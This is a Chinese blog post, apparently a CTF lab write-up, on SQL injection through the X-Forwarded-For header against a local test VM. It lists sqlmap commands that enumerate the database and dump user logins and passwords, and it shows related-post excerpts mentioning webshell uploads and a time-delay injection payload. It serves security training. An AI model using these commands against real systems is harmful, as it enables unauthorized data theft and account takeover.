CTF-SQL注入(X-Forwarded-For)

最新推荐文章于 2022-05-24 16:47:04 发布
最新推荐文章于 2022-05-24 16:47:04 发布
阅读量573 收藏
点赞数
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/su__xiaoyan/article/details/111631887
版权
这篇博客探讨了X-Forwarded-For(XFF)注入,这是一种利用HTTP请求头部字段XFF进行SQL注入的攻击方式。实验环境中,攻击者通过KaliLinux对运行在Debian6上的靶机进行检测,发现存在XFF注入,且为延时注入类型。利用sqlmap工具,攻击者可以获取数据库中的数据表名、字段以及具体数据,进一步可能利用这些信息登录网站后台。
摘要由CSDN通过智能技术生成

SQL注入

当Web应用向后台数据库传递SQL语句进行数据库操作时。如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎执行,获取或修改数据库中的数据。

X-Forwarded-For

HTTP请求头部字段,用来表示 HTTP 请求端真实 IP。

XFF注入/ X-Forwarded-For

XFF,是X-Forwarded-for的缩写,XFF注入是SQL注入的一种,该注入原理是通过修改X-Forwarded-for头对带入系统的dns进行sql注入,从而得到网站的数据库内容。

实验环境:

攻击者:Kali Linux(192.168.100.146)
靶机:VMware workstations Pro——Debian 6(32-bit)(192.168.100.132)

实验流程:

  1. 利用sqlmap检测网站时都存在XFF注入
    命令:sqlmap -u http://192.168.100.132 --headers=“X-Forwarded-For:*” --batch –dbs
    在这里插入图片描述
    经过检测,存在XFF注入,注入手法为延时注入
  2. 获取数据表名
    命令:sqlmap -u http://192.168.100.132 --headers=“X-Forwarded-For:*” --batch -D photoblog --tables
    在这里插入图片描述
  3. 获取字段
    命令:sqlmap -u http://192.168.100.132 --headers=“X-Forwarded-For:*” --batch -D photoblog -T users --columns
    在这里插入图片描述
  4. 获取数据
    命令:sqlmap -u http://192.168.100.132 --headers=“X-Forwarded-For:*” --batch -D photoblog -T users -C login,password –dump
    在这里插入图片描述
  5. 利用用户名和密码登录网站后台
    在这里插入图片描述
采姑娘の小蘑菇
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF练习:SQL注入之X-Forwarded-For报头
qq_43233085的博客
11-28 983
CTF练习:SQL注入之get参数注入环境准备信息收集漏洞挖掘sqlmap注入上传shell脚本(copy)拿到靶机shell(copy) 靶机地址: 链接: https://pan.baidu.com/s/1u-br8L4Lk4X7EGS7kROhMQ 提取码: 2fmj 环境准备 开启两台机器,一台靶机一台kali攻击机,配置好桥接网络,使其在同一网段内。 查看攻击机kali的IP,为172....
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CTF-sql注入(X-Forwarded-For)
Reaches_r的博客
08-05 281
1.扫描目标IP发现只开了80http服务 2.进去有个登录界面,考虑sql注入得到账户密码 3.启动AWVS(AcunetixWeb Vulnarability Scanner)添加目标,扫描发现存在X-Forwarded-For注入漏洞 4.使用sqlmap注入攻击(--batch表示自动回应询问) (1)得到数据库名 (2)同理得到表名、列名,暴力破解出账户密码 5.登录后台,上传webshell,控制目标,具体步骤参考前面的文章。 ...
SQL注入:X-Forwarded-For注入
zh的博客
10-11 498
靶场地址:http://www.whalwl.host:8010/ 解题准备:本题需要使用burpsuite抓包 解题思路: 1、根据提示,直接抓包,添加X-Forwarded-For参数 a' 2、根据报错,确定闭合符为 ' 构造:a' order by 6# 5正常,6错误,确定字段数为5 3、构造联合查询,发现有2,3回显 4、获得user和database 5、后续注入通过联合查询可以很快获取flag ...
ctf训练 web安全SQL注入(X-Forwarded-For)
qq_43799246的博客
12-02 570
ctf训练 web安全SQL注入(X-Forwarded-For) SQL注入漏洞介绍 SQL注入攻击指用用户构建特殊的输入作为参数传入Web应用程序,通过执行sQ语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 任何一个用户可以输入的位置都可能是注入点。比如url中,以及http报文中; 实验环境 一台kail攻击机 和 靶机 靶机镜像:https://pan.baidu.com/s/1juB-vkfP9C7RHEM5T4ffAA 提取码:dquy 安
CTF-sql注入(X-Forwarded-For)
不知名白帽的博客
05-24 388
CTF-sql注入(X-Forwarded-For),实验环境:kali(192.168.20.128),靶机(192.168.20.132)。先进行信息探测,再用AWVS进行漏洞扫描,完后通过sqlmap利用漏洞,查看账户和密码
sql之XFF注入
weixin_45007073的博客
01-03 823
首先介绍一下X-Forward-For是什么东西 X-Forwarded-For 是一个 HTTP 扩展头部。HTTP/1.1(RFC 2616)协议并没有对它的定义,它最开始是由 Squid 这个缓存代理软件引入,用来表示 HTTP 请求端真实 IP。如今它已经成为事实上的标准,被各大 HTTP 代理、负载均衡等转发服务广泛使用,并被写入 RFC 7239(Forwarded HTTP Extension)标准之中。 准备工作 开启靶场:这里我选用的是墨客的靶场 漏洞复现过程 先使用默认admin和
http细节
evsqiezi
07-25 427
X-Forwarded-For 通过名字就知道,X-Forwarded-For 是一个 HTTP 扩展头部。HTTP/1.1(RFC 2616)协议并没有对它的定义,它最开始是由 Squid 这个缓存代理软件引入,用来表示 HTTP 请求端真实 IP。如今它已经成为事实上的标准,被各大 HTTP 代理、负载均衡等转发服务广泛使用,并被写入 RFC 7239(Forwarded HTTP Ex
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
ctf-all-in-one
01-30
ctf-all-in-one
CTF-100题.-天天练习-学习
11-01
CTF-100题.-----------------天天练习------------------学习 100小题,试例练习
CTF-Tools-v1.3.7.zip
01-29
CTF常用工具集
利用X-Forwarded-For进行sql注入
wqj975005563的专栏
06-06 4514
由于系统一般会采用String ip = request.getHeader("X-Forwarded-For");进行获取ip,然后注入者就可以通过X-Forwarded-For请求头信息就行伪造ip,当然了这个ip也可以是一些注入语句,如下X-Forwarded-For:payload';WAITFOR DELAY '0:0:5'--String sql = "select * from ta...
CTF实验:X-Forwarded-For头注入
floyd_art的博客
04-01 1558
SQL注入漏洞介绍 SQL注入攻击指用用户构建特殊的输入作为参数传入Web应用程序,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 任何一个用户可以输入的位置都可能是注入点。比如url中,以及http报文中; 信息探测 扫描主机服务信息以及服务版本 – nmap -sV 靶场IP地址 快速扫描主机全部信息 – nmap -T4 ...
CTF—攻防练习之HTTP—SQL注入(X-forwarded-For)
weixin_30852419的博客
06-19 420
主机:192.168.32.152 靶机:192.168.32.162 nmap,dirb扫ip,扫目录 在后台发现一个login,登录界面 然后直接上扫描器AVWS,发现存在X—Forwarded—For类型的时间盲注 那直接sqlmap sqlmap -u "192.168.32.162" --headers="X-Forwarded-For:* " ...
CTF-SQL注入-X-Forwarded-For报文头
whatiwhere的博客
12-02 1320
nmap -sV xxxxx nmap -T4 -A -v xxxx nikto -host http://192.168.173.134/ 发现了后台登陆地址,但弱口令无法登陆 使用awvs扫描 安全漏洞 高危漏洞 盲注 使用sqlmap进行 注入 sqlmap -u “http://192.168.176.134/” --headers=“X-Forwarded-For:*” -...
head注入(X-Forwarded-For)
qq_39416206的博客
03-08 2225
head注入
SQL注入XFF注入攻击
coderge's CSDN Blog.
09-19 3063
目录 在线靶场地址:https://www.mozhe.cn/bug/detail/10 背景介绍 实训目标 解题方向 获取当前数据库的库名 然后获取表名 再获取字段名: 然后获得数据: 在线靶场地址:https://www.mozhe.cn/bug/detail/10 背景介绍 某业务系统,安全工程师"墨者"进行授权黑盒测试,系统的业主单位也没有给账号密码,怎么测? 实训目标 掌握SQL注入的基本原理; 了解服务器获取客户端IP的方式; 了解SQL注入的工具使用; 解题...
CTF-目录遍历
su__xiaoyan的博客
12-28 3527
目录遍历 目录遍历(又称为路径遍历攻击、目录爬升或者回溯),旨在访问存储在web根目录文件夹之外的文件和目录,通过操纵带有“点-点-斜线”序列及变化的文件或使用绝对文件路径来引用文件的变量,可以访问存储在文件系统上的任意文件和目录,包括应用程序源代码、配置文件和系统关键文件。但是系统访问控制限制了对于某些文件的权限。 利用目录遍历漏洞getshell的思路 上传webshell到服务器上面,通过对应的目录遍历漏洞访问webshell,执行webshell,在攻击者的机器上面获取并反弹shell。 实
ctf-qsnctf此地无银三百
最新发布
02-20
ctf-qsnctf是一个CTF(Capture The Flag)比赛平台,它提供了一系列的网络安全挑战,旨在帮助参与者提升网络安全技能和解决问题的能力。在ctf-qsnctf平台上,参与者可以通过解决各种类型的题目来获取旗帜(flag),...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值